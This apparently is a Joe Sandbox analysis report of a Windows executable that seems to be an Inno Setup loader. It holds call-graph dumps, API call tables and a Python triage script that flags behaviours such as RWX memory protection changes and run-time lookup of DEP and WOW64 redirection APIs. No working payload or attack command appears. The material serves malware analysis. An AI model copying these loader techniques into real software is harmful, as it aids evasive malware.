6249->6250 6251 4025ac 4 API calls 6250->6251 6251->6248 6252 403a52 6253 403a74 6252->6253 6254 403a5a WriteFile 6252->6254 6254->6253 6255 403a78 GetLastError 6254->6255 6255->6253 6256 402654 6257 403154 4 API calls 6256->6257 6258 402614 6257->6258 6259 402632 6258->6259 6260 403154 4 API calls 6258->6260 6259->6259 6260->6259 6261 40ac56 6262 40ac5d 6261->6262 6264 40ac88 6261->6264 6271 409448 6262->6271 6266 403198 4 API calls 6264->6266 6265 40ac62 6265->6264 6268 40ac80 MessageBoxA 6265->6268 6267 40acc0 6266->6267 6269 403198 4 API calls 6267->6269 6268->6264 6270 40acc8 6269->6270 6272 409454 GetCurrentProcess OpenProcessToken 6271->6272 6273 4094af ExitWindowsEx 6271->6273 6274 409466 6272->6274 6275 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6272->6275 6273->6274 6274->6265 6275->6273 6275->6274 6730 40995e 6732 409960 6730->6732 6731 409982 6732->6731 6733 40999e CallWindowProcA 6732->6733 6733->6731 6734 409960 6735 409982 6734->6735 6737 40996f 6734->6737 6736 40999e CallWindowProcA 6736->6735 6737->6735 6737->6736 6738 405160 6739 405173 6738->6739 6740 404e58 33 API calls 6739->6740 6741 405187 6740->6741 6276 402e64 6277 402e69 6276->6277 6278 402e7a RtlUnwind 6277->6278 6279 402e5e 6277->6279 6280 402e9d 6278->6280 5898 40766c SetFilePointer 5899 4076a3 5898->5899 5900 407693 GetLastError 5898->5900 5900->5899 5901 40769c 5900->5901 5902 40748c 35 API calls 5901->5902 5902->5899 6293 40667c IsDBCSLeadByte 6294 406694 6293->6294 6754 403f7d 6755 403fa2 6754->6755 6758 403f84 6754->6758 6757 403e8e 4 API calls 6755->6757 6755->6758 6756 403f8c 6757->6758 6758->6756 6759 402674 4 API calls 6758->6759 6760 403fca 6759->6760 6761 403d02 6767 403d12 6761->6767 6762 403ddf ExitProcess 6763 403db8 6764 403cc8 4 API calls 6763->6764 6766 403dc2 6764->6766 6765 403dea 6768 403cc8 4 API calls 6766->6768 6767->6762 6767->6763 6767->6765 6767->6767 6771 403da4 6767->6771 6772 403d8f MessageBoxA 6767->6772 6769 403dcc 6768->6769 6781 
4019dc 6769->6781 6777 403fe4 6771->6777 6772->6763 6773 403dd1 6773->6762 6773->6765 6778 403fe8 6777->6778 6779 403f07 4 API calls 6778->6779 6780 404006 6779->6780 6782 401abb 6781->6782 6783 4019ed 6781->6783 6782->6773 6784 401a04 RtlEnterCriticalSection 6783->6784 6785 401a0e LocalFree 6783->6785 6784->6785 6786 401a41 6785->6786 6787 401a2f VirtualFree 6786->6787 6788 401a49 6786->6788 6787->6786 6789 401a70 LocalFree 6788->6789 6790 401a87 6788->6790 6789->6789 6789->6790 6791 401aa9 RtlDeleteCriticalSection 6790->6791 6792 401a9f RtlLeaveCriticalSection 6790->6792 6791->6773 6792->6791 6299 404206 6300 4041cc 6299->6300 6303 40420a 6299->6303 6301 404282 6302 403154 4 API calls 6304 404323 6302->6304 6303->6301 6303->6302 6305 402c08 6306 402c82 6305->6306 6309 402c19 6305->6309 6307 402c56 RtlUnwind 6308 403154 4 API calls 6307->6308 6308->6306 6309->6306 6309->6307 6312 402b28 6309->6312 6313 402b31 RaiseException 6312->6313 6314 402b47 6312->6314 6313->6314 6314->6307 6315 408c10 6316 408c17 6315->6316 6317 403198 4 API calls 6316->6317 6325 408cb1 6317->6325 6318 408cdc 6319 4031b8 4 API calls 6318->6319 6320 408d69 6319->6320 6321 408cc8 6323 4032fc 18 API calls 6321->6323 6322 403278 18 API calls 6322->6325 6323->6318 6324 4032fc 18 API calls 6324->6325 6325->6318 6325->6321 6325->6322 6325->6324 6330 40a814 6331 40a839 6330->6331 6332 40993c 29 API calls 6331->6332 6335 40a83e 6332->6335 6333 40a891 6364 4026c4 GetSystemTime 6333->6364 6335->6333 6338 408dd8 18 API calls 6335->6338 6336 40a896 6337 409330 46 API calls 6336->6337 6339 40a89e 6337->6339 6340 40a86d 6338->6340 6341 4031e8 18 API calls 6339->6341 6344 40a875 MessageBoxA 6340->6344 6342 40a8ab 6341->6342 6343 406928 19 API calls 6342->6343 6345 40a8b8 6343->6345 6344->6333 6346 40a882 6344->6346 6347 4066c0 19 API calls 6345->6347 6348 405864 19 API calls 6346->6348 6349 40a8c8 6347->6349 6348->6333 6350 406638 19 API calls 6349->6350 6351 40a8d9 6350->6351 6352 403340 18 API calls 
6351->6352 6353 40a8e7 6352->6353 6354 4031e8 18 API calls 6353->6354 6355 40a8f7 6354->6355 6356 4074e0 37 API calls 6355->6356 6357 40a936 6356->6357 6358 402594 18 API calls 6357->6358 6359 40a956 6358->6359 6360 407a28 19 API calls 6359->6360 6361 40a998 6360->6361 6362 407cb8 35 API calls 6361->6362 6363 40a9bf 6362->6363 6364->6336 5442 407017 5443 407008 SetErrorMode 5442->5443 6365 403018 6366 403070 6365->6366 6367 403025 6365->6367 6368 40302a RtlUnwind 6367->6368 6369 40304e 6368->6369 6371 402f78 6369->6371 6372 402be8 6369->6372 6373 402bf1 RaiseException 6372->6373 6374 402c04 6372->6374 6373->6374 6374->6366 6379 40901e 6380 409010 6379->6380 6381 408fac Wow64RevertWow64FsRedirection 6380->6381 6382 409018 6381->6382 6383 409020 SetLastError 6384 409029 6383->6384 6399 403a28 ReadFile 6400 403a46 6399->6400 6401 403a49 GetLastError 6399->6401 5903 40762c ReadFile 5904 407663 5903->5904 5905 40764c 5903->5905 5906 407652 GetLastError 5905->5906 5907 40765c 5905->5907 5906->5904 5906->5907 5908 40748c 35 API calls 5907->5908 5908->5904 6803 40712e 6804 407118 6803->6804 6805 403198 4 API calls 6804->6805 6806 407120 6805->6806 6807 403198 4 API calls 6806->6807 6808 407128 6807->6808 5923 40a82f 5924 409ae8 18 API calls 5923->5924 5925 40a834 5924->5925 5926 40a839 5925->5926 5927 402f24 5 API calls 5925->5927 5960 40993c 5926->5960 5927->5926 5929 40a891 5965 4026c4 GetSystemTime 5929->5965 5931 40a83e 5931->5929 6026 408dd8 5931->6026 5932 40a896 5966 409330 5932->5966 5936 40a86d 5940 40a875 MessageBoxA 5936->5940 5937 4031e8 18 API calls 5938 40a8ab 5937->5938 5984 406928 5938->5984 5940->5929 5942 40a882 5940->5942 6029 405864 5942->6029 5947 40a8d9 6011 403340 5947->6011 5949 40a8e7 5950 4031e8 18 API calls 5949->5950 5951 40a8f7 5950->5951 5952 4074e0 37 API calls 5951->5952 5953 40a936 5952->5953 5954 402594 18 API calls 5953->5954 5955 40a956 5954->5955 5956 407a28 19 API calls 5955->5956 5957 40a998 5956->5957 5958 407cb8 35 API calls 
5957->5958 5959 40a9bf 5958->5959 6033 40953c 5960->6033 5963 4098cc 19 API calls 5964 40995c 5963->5964 5964->5931 5965->5932 5975 409350 5966->5975 5969 409375 CreateDirectoryA 5970 4093ed 5969->5970 5971 40937f GetLastError 5969->5971 5972 40322c 4 API calls 5970->5972 5971->5975 5973 4093f7 5972->5973 5976 4031b8 4 API calls 5973->5976 5974 408dd8 18 API calls 5974->5975 5975->5969 5975->5974 5977 404c94 33 API calls 5975->5977 5980 407284 19 API calls 5975->5980 5982 408da8 18 API calls 5975->5982 5983 405890 18 API calls 5975->5983 6089 406cf4 5975->6089 6112 409224 5975->6112 5978 409411 5976->5978 5977->5975 5979 4031b8 4 API calls 5978->5979 5981 40941e 5979->5981 5980->5975 5981->5937 5982->5975 5983->5975 6218 406820 5984->6218 5987 403454 18 API calls 5988 40694a 5987->5988 5989 4066c0 5988->5989 6223 4068e4 5989->6223 5992 4066f0 5994 403340 18 API calls 5992->5994 5993 4066fe 5995 403454 18 API calls 5993->5995 5998 4066fc 5994->5998 5996 406711 5995->5996 5997 403340 18 API calls 5996->5997 5997->5998 5999 403198 4 API calls 5998->5999 6000 406733 5999->6000 6001 406638 6000->6001 6002 406642 6001->6002 6003 406665 6001->6003 6229 406950 6002->6229 6004 40322c 4 API calls 6003->6004 6006 40666e 6004->6006 6006->5947 6007 406649 6007->6003 6008 406654 6007->6008 6009 403340 18 API calls 6008->6009 6010 406662 6009->6010 6010->5947 6012 403344 6011->6012 6015 4033a5 6011->6015 6013 40334c 6012->6013 6014 4031e8 6012->6014 6013->6015 6016 40335b 6013->6016 6019 4031e8 18 API calls 6013->6019 6018 403254 18 API calls 6014->6018 6021 4031fc 6014->6021 6020 403254 18 API calls 6016->6020 6017 403228 6017->5949 6018->6021 6019->6016 6023 403375 6020->6023 6021->6017 6022 4025ac 4 API calls 6021->6022 6022->6017 6024 4031e8 18 API calls 6023->6024 6025 4033a1 6024->6025 6025->5949 6027 408da8 18 API calls 6026->6027 6028 408df4 6027->6028 6028->5936 6030 405869 6029->6030 6031 405940 19 API calls 6030->6031 6032 40587b 6031->6032 6032->6032 6040 40955b 
6033->6040 6034 409590 6036 40959d GetUserDefaultLangID 6034->6036 6041 409592 6034->6041 6035 409594 6045 407024 GetModuleHandleA GetProcAddress 6035->6045 6036->6041 6039 40956f 6039->5963 6040->6034 6040->6035 6040->6039 6041->6039 6042 4095cb GetACP 6041->6042 6043 4095ef 6041->6043 6042->6039 6042->6041 6043->6039 6044 409615 GetACP 6043->6044 6044->6039 6044->6043 6046 407067 6045->6046 6047 40705e 6045->6047 6048 407070 6046->6048 6049 4070a8 6046->6049 6056 403198 4 API calls 6047->6056 6066 406f68 6048->6066 6050 406f68 RegOpenKeyExA 6049->6050 6054 4070c1 6050->6054 6052 407089 6053 4070de 6052->6053 6069 406f5c 6052->6069 6058 40322c 4 API calls 6053->6058 6054->6053 6057 406f5c 20 API calls 6054->6057 6060 407120 6056->6060 6061 4070d5 RegCloseKey 6057->6061 6062 4070eb 6058->6062 6063 403198 4 API calls 6060->6063 6061->6053 6064 4032fc 18 API calls 6062->6064 6065 407128 6063->6065 6064->6047 6065->6041 6067 406f73 6066->6067 6068 406f79 RegOpenKeyExA 6066->6068 6067->6068 6068->6052 6072 406e10 6069->6072 6073 406e36 RegQueryValueExA 6072->6073 6074 406e59 6073->6074 6079 406e7b 6073->6079 6075 406e73 6074->6075 6074->6079 6080 403278 18 API calls 6074->6080 6081 403420 18 API calls 6074->6081 6077 403198 4 API calls 6075->6077 6076 403198 4 API calls 6078 406f47 RegCloseKey 6076->6078 6077->6079 6078->6053 6079->6076 6080->6074 6082 406eb0 RegQueryValueExA 6081->6082 6082->6073 6083 406ecc 6082->6083 6083->6079 6084 4034f0 18 API calls 6083->6084 6085 406f0e 6084->6085 6086 406f20 6085->6086 6088 403420 18 API calls 6085->6088 6087 4031e8 18 API calls 6086->6087 6087->6079 6088->6086 6131 406a58 6089->6131 6093 406a58 19 API calls 6095 406d36 6093->6095 6094 406d26 6094->6093 6096 406d72 6094->6096 6097 406d42 6095->6097 6099 406a34 21 API calls 6095->6099 6139 406888 6096->6139 6097->6096 6100 406d67 6097->6100 6103 406a58 19 API calls 6097->6103 6099->6097 6100->6096 6151 406cc8 GetWindowsDirectoryA 6100->6151 6105 406d5b 6103->6105 6104 406638 19 

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                        APIs
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                        • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2441996862-0
                                                                                        • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                        • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                        • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                        • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02092474), ref: 0040966C
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(0001041E,000000FC,00409960), ref: 0040AB15
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(0001041E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                        • API String ID: 3757039580-3001827809
                                                                                        • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                        • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                        • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                        • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                        • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E
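The three API listings above (VirtualProtect with new protection 00000040 at 00409BD6, the GetProcAddress chain that ends in SetProcessDEPPolicy at 004045C6, and the GetModuleHandleA/GetProcAddress lookups of Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection) are the kind of lines an analyst copies out of a report for triage. The script below is an added example, not Joe Sandbox's own code: it parses lines in the report's "API.MODULE(args), ref: address" form and flags the behaviours the signatures at the top of the report name (section rights changed to PAGE_EXECUTE_READWRITE, run-time resolution of DEP and WOW64 file-system-redirection APIs, the DEP opt-in, and the InnoSetupLdrWindow marker window). The sample lines are copied from this report; WATCHED_IMPORTS, parse_api_line and triage are the example's own names, and 0x40 (PAGE_EXECUTE_READWRITE) and 0x1 (PROCESS_DEP_ENABLE) are the Windows constants.

```python
"""Triage helper for Joe Sandbox 'APIs' lines (added example, not Joe Sandbox code).

Input lines look like:
    • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
Each argument slot is '?', an 8-digit hex value, or a string the sandbox recovered.
"""
import re
from dataclasses import dataclass

PAGE_EXECUTE_READWRITE = 0x40  # VirtualProtect flNewProtect value (Windows constant)
PROCESS_DEP_ENABLE = 0x1       # SetProcessDEPPolicy flag (Windows constant)

# Example's own watch list: imports whose run-time resolution is worth noting.
WATCHED_IMPORTS = {
    "SetProcessDEPPolicy", "SetDllDirectoryW", "SetSearchPathMode",
    "Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection",
}
INNO_LDR_WINDOW = "InnoSetupLdrWindow"  # hidden window name of the Inno Setup loader

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: list      # int for hex slots, None for '?', str for recovered strings
    subcall: bool   # True for '• Part of subcall function ...' entries


@dataclass
class Finding:
    ref: int
    api: str
    reason: str


def parse_api_line(line):
    """Return an ApiCall for one report line, or None for legends and other text."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = []
    for slot in (m.group("args") or "").split(","):
        slot = slot.strip()
        if not slot:
            continue
        if slot == "?":
            args.append(None)
        elif HEX8.match(slot):
            args.append(int(slot, 16))
        else:
            args.append(slot)
    return ApiCall(m.group("api"), m.group("module"), int(m.group("ref"), 16),
                   args, "Part of subcall" in line)


def triage(lines):
    """Flag the behaviours the report's signatures describe, in input order."""
    findings = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        # Slot 2 of VirtualProtect is flNewProtect; RWX on an image range is the
        # 'changes PE section rights' behaviour.
        if call.api == "VirtualProtect" and len(call.args) > 2 \
                and call.args[2] == PAGE_EXECUTE_READWRITE:
            findings.append(Finding(call.ref, call.api,
                                    "flNewProtect=PAGE_EXECUTE_READWRITE (RWX)"))
        # Printed arguments are raw stack slots, so the import name may sit on
        # the GetModuleHandleA line rather than on GetProcAddress itself.
        if call.api in ("GetProcAddress", "GetModuleHandleA"):
            for slot in call.args:
                if isinstance(slot, str) and slot in WATCHED_IMPORTS:
                    findings.append(Finding(call.ref, call.api,
                                            f"run-time resolution of {slot}"))
        if call.api == "SetProcessDEPPolicy" and call.args \
                and call.args[0] == PROCESS_DEP_ENABLE:
            findings.append(Finding(call.ref, call.api,
                                    "PROCESS_DEP_ENABLE (process opts into DEP)"))
        if call.api == "CreateWindowExA" and INNO_LDR_WINDOW in call.args:
            findings.append(Finding(call.ref, call.api,
                                    "Inno Setup loader marker window"))
    return findings


# Constructed sample: lines copied from this report, plus one legend line.
SAMPLE_LINES = [
    "• GetSystemInfo.KERNEL32(?), ref: 00409B8A",
    "• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95",
    "• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6",
    "• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08",
    "• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582",
    "• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB",
    "• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6",
    "• GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4",
    "• SetLastError.KERNEL32 ref: 0040AAC1",
    "  • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02092474), ref: 0040966C",
    "• CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE",
    "• Executed",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f"{f.ref:08X}  {f.api:<20} {f.reason}")
```

Only the first VirtualProtect (00409BD6) is flagged: its third stack slot is 00000040, while the second call at 00409C08 has '?' in that position, consistent with restoring the protection saved by the first call. Because the argument columns are raw stack slots, a string can show up on a neighbouring call (the Wow64 names appear on the GetModuleHandleA line), which is why the watch list is checked on both GetModuleHandleA and GetProcAddress.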

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(0001041E,000000FC,00409960), ref: 0040AB15
                                                                                          • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                          • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000), ref: 00409A70
                                                                                          • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                          • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                          • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8), ref: 00409AA4
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(0001041E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                        • API String ID: 3586484885-3001827809
                                                                                        • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                        • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                        • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02092474,00409AD8,00000000,00409ABF), ref: 00409A5C
